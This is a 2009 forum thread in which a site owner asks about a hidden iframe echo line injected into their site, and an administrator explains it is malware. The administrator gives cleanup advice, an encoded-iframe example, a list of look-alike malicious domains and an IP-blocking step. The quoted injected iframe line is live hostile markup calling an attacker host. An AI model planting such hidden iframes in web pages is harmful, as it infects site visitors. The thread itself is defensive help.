Go Back   Web Design & SEO Company > SEO

SEO Search Engine Optimization, this section lists articles and tutorials on Search Engine Optimization for various Search Engines including Google, Yahoo & MSN. We provide SEO hints, tips and other free goodies to help you optimize your site and to start ranking well in the Search Engines.

Reply
 
  #1  
Old 01-03-2009, 10:09 AM
Member
 
Join Date: Dec 2008
Posts: 58
Default what is this echo "<iframe src=\"http://thedeadpit.com/?click=4859468

echo "<iframe src=\"http://thedeadpit.com/?click=4859468\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

a script is coming in my site as echo "<iframe src=\"http://thedeadpit.com/?click=4859468

i want to know what is this??
Reply With Quote
Top SEO Tool
Harvester and Mass Blog Commenter
Blog Comment Software

  #2  
Old 01-03-2009, 07:30 PM
Admin's Avatar
Administrator
 
Join Date: Jan 2007
Location: Taree
Posts: 613
Default

It's injecting Malware in to your site, and attempting to infect every visitor that views your web page by pulling code through the iFrame from their server to your visitors browser. You really need to remove it ASAP, otherwise it will infect people and Google will label your site as Malware.

After your remove it, update all your scripts powering your site to the latest versions, check your filesystem for any files which don't belong there or that have been modified recently. Also scan your database any see if any malicious code is in there also.

Now here's the thing, there is a good chance this thing has infected your PC and "sniffed" your FTP username and password to your server. Which means even if you update your scripts, simply logging on to FTP will transmit your pass and it will infect you again. Changing your FTP password obviously won't help because the new one will be sent again when logging on to FTP.

So.. You need to scan your PC with a number of Virus and Malware scanners because often these loggers on your PC are ahead of the game and hard to detect.

First up, i recommend a full system scan with Malware Bytes Anti-Malware they have a free version and it's very sensitive, plus does a brilliant job of removal.

Also, the iFrame in your page may be encoded and look something similar to the below code:

Code:
<script type="text/javascript">
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%74%61%72%65%65%69%6E%74%65%72%6E%65%74%2E%63%6F%6D%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</script>
If so we have built a decoder that decodes it back in to a readable domain name. Just paste the code in our Unescape Decoder and Encoder tool and hit decode. The above decodes to a harmless iFrame with the Taree Internet URL:

Code:
<script type="text/javascript">
<!--
document.write(unescape('<iframe src="http://tareeinternet.com"></iframe>'));
//-->
</script>
Edit: 12th April 2009

Just a small update, there's a number of other domains popped up that are involved with an almost identical iFrame exploit. The tips in the post also apply to the new domains, and the same conditions apply this exploit is most likely on your PC and is sending out your FTP details every time you connect.

Domains:

goooogleadsence.biz
google-ana1yticz.com
googleabsence.biz
hyperliteautoservices.cn
mediahousenameshopfilm.cn

As you can see with the first 3 domains, they are intentionally trying to look like a valid Google service. This list is by no means complete, domains are under $10 and it's nothing for the people doing these iFrame exploits to register 100 at a time.
Reply With Quote
  #3  
Old 02-07-2009, 08:35 AM
Admin's Avatar
Administrator
 
Join Date: Jan 2007
Location: Taree
Posts: 613
Default

I noticed since posting this thread it's had about 1,000 hits so thedeadpit.com has obviously infected a lot of people and i see the domain is still active. So i just thought i'd add this bit of info, which will also help prevent more users being infected.

You can block your server from making a connection with his, this is something you can do even if you haven't been hit with the Malware as a precaution if you want to.

Most websites use cPanel as a control panel, so login to cPanel and click the "IP Deny Manager" icon which looks something like this:



Then enter the the IP 89.41.131.143 like so and click Add:



That's it, your server will now block connections with his and prevent the malicious downloader from being fetched off his server when either you or a visitor loads your page.

Likewise if you are a visitor who doesn't own a website, but received a pop-up or notification when browsing about Thedeadpit.com you can add this IP to your PC's Firewall and block all In & Outbound connections from the IP.

But please note, you still need to follow the steps in my first post and do full system scans and take measures to remove it completely. Blocking the IP will just halt the malicious activity so it doesn't infect more people, steal your passwords or reinfect you or your sites files while you are removing it. Also as protection if your page gets injected with the code, it won't connect to the Trojan downloader and propagate.
Reply With Quote
Top SEO Tool
Harvester and Mass Blog Commenter
Blog Comment Software

Reply

Tools
Display Modes

Similar Threads
Thread Thread Starter Forum Replies Last Post
"Spexel" - Free Premium Quality WordPress Theme - Advanced Options WPVulpe Wordpress Themes 0 11-23-2009 03:05 AM
Free Premium Magazine style Poker wp theme "CASINO MAG" tendulkar2 Wordpress Themes 0 04-14-2009 01:12 PM
FREE Wordpress theme "Lonely Tree" - download now! tendulkar2 Wordpress Themes 0 04-04-2009 07:30 AM
"Wooden ZigZag" free WordPress theme thebookish Wordpress Themes 0 03-07-2009 04:34 PM
Free wordpress theme "woman apparel" kedaimart Wordpress Themes 0 12-17-2008 09:49 AM
Free wordpress theme "christmas love" kedaimart Wordpress Themes 0 12-15-2008 12:33 PM
Free Wordpress Theme Beautiful "Butterflies" topwpsites Wordpress Themes 0 07-21-2008 08:20 PM



Knowledgebase | SEO | Free Scripts | Free Wordpress Themes | Free Graphics

eval gzinflate base64 decode | SEO Addons


Forum time zone is GMT. Currently it's 11:28 AM.

SEO - Top



Web Design & SEO Forums